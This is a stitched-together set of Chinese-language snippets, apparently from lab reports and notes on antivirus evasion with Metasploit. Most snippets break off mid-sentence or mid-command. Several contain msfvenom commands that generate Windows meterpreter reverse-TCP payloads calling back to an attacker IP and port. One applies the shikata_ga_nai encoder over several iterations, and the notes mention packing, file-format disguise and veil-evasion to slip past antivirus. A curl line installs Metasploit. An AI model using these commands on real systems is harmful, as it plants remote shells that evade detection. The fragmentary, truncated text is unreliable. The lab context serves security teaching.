一、准备工作先在kali安装Apache2，下载代码如下sudoaptinstallapache2 启动Apache2服务serviceapache2start 在kali浏览器中输入你的kaliIP，得到该页面说明启动成功二、开始1.msf远控生成（1）在kali运行msf生成exemsfvenom-pwindows/meterpreter/reverse_t

1.实验内容学习了恶意代码和恶意代码的分析，并介绍了信息搜集技术和怎样进行信息搜集。2.实验过程1.1正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧（1）使用msf生成可执行文件并检测生成payload并检测msfvenom-pwindows/meterpreter/reverse_tcpLHOS

一、实验内容本次实验的目标在于运用多重加密、文件格式伪装、数据填充、加壳等技术方法达成恶意代码的免杀效果，生成恶意程序，并对其进行测试，以检验其能否成功躲避杀毒软件的检测。本次实验具体内容如下：1．正确使用msf编码器，使用msfvenom生成如jar之类的其他文件；2．能够使用veil，加壳

1.实验内容正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧正确使用msf编码器，使用msfvenom生成如jar之类的其他文件veil，加壳工具使用C+shellcode编程通过组合应用各种技术实现恶意代码免杀如果成功实现了免杀的，简单语言描述原理，不要截图。与杀软

免杀原理1.基础问题回答杀软是如何检测出恶意代码的？基于特征码的静态扫描技术在文件中寻找特定的十六进制字符串，如果找到，就可判定文件感染了某种病毒。启发式杀毒技术病毒要达到感染和破坏的目的，通常的行为都会有一定的行为和特征,所以可以通过分析相关的病毒指令，判

windows:msfvenom-ax86--platformWindows-pwindows/meterpreter/reverse_tcpLHOST=攻击机IPLPORT=攻击机端口-ex86/shikata_ga_nai-b'\x00\x0a\xff'-i3-

二进制windowsmsfvenom-pwindows/meterpreter/reverse_tcpLHOST=10.211.55.2LPORT=3333-ax86--platformWindows-fexe>shell.exemsfvenom-pwindows/x64/meterp

Installationcurlhttps://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb>msfinstall&&